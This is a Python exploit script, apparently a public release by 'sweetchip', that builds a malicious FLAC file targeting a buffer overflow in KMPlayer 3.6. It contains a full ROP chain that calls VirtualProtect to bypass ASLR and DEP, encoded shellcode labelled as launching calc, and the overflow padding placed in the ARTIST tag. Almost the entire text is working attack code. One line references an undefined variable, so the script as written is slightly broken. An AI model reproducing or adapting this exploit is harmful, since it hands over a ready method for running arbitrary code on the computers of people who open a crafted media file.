from socket import *
import sys
import struct
import time
"""
Kmplayer 3.6 Buffer Overflow exploit
*Very* Low Reliablity :I
By sweetchip
"""
print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
print "[*] Author : sweetchip | 2013.04.18\n"
print "[*] Public Release Date : 2015.11.12"
filename = "Exploit_bypass_ASLR_DEP.flac"
# Header
Head1 = ("\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
"\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
"\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")
head2 = "\x00\x00\x00\x01\x00\x00\x00"
EndofHead = ("\x81\x00\xA4\x46")
# cmd = calc
# encoder - x86/alpha_mixed
shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
"\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
"\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
"\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
"\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
"\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
"\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
"\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
"\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
"\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
"\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
"\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
"\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
"\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
"\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
"\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
"\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
"\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
"\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
"\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
"\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
"\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
"\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
"\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
"\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
"\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
"\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
"\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
"\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")
#############################################################################################################################################
##### ROP
##### special thanks to mona and corelan team
#############################################################################################################################################
rop_gadgets = ""
rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11047e74) # ptr to &VirtualProtect() [IAT bass.dll]
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "DEAD"
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "BEEF"
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "SWEE"
rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]
rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]
rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x00005050) # 0x00000201-> ebx
rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> edx
rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x7d782020) # Writable location 7d782020
rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]
rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x44444444) # inc inc inc inc lol
rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
#############################################################################################################################################
stage1 = ""
stage1 += "C" * 3028
stage1 += rop_gadgets
stage1 += shellcode
#65536
# trigger a BOF / and will Execute shellcode
artist = "ARTIST="
artist += "A" * 60000
artist += "A" * 4848
artist += struct.pack('<I', 0x7d79192c)
artist += "A" * 137
artist += struct.pack('<I', 0x10402f0f) # POP ESP # RETN ** [bass_flac.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
artist += struct.pack('<I', 0x7d791930) # ptr to 7d761930
artist += "B" * (140000 -4848-4-4-4-137)
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
artist += stage1
artist += "Z" * (65536-len(stage1))
#artist += "C" * 3028
#artist += rop_gadgets
#artist += shellcode
sartist += "A" * 100000
artistlength = struct.pack('<I', len(artist))
# length
payloadlen = struct.pack('>I', len(head2 + EndofHead + artistlength + artist)*256)
# Payload.
exploit = Head1
exploit += payloadlen
exploit += head2
exploit += artistlength
exploit += artist
exploit += EndofHead
exploit += "\x00" * 118000
print "\n[*] Generating Flac file....."
print "[ ] Payload size :", (len(exploit))
print "[ ] Shellcode size : \n"
f = open(filename,'w')
f.write(exploit)
f.close()
print "[*] Malicious File generated Successfully!!!"
print "[ ] file name : " + filename
raw_input("\npress enter to continue :D . . . . .")
#End OF Source.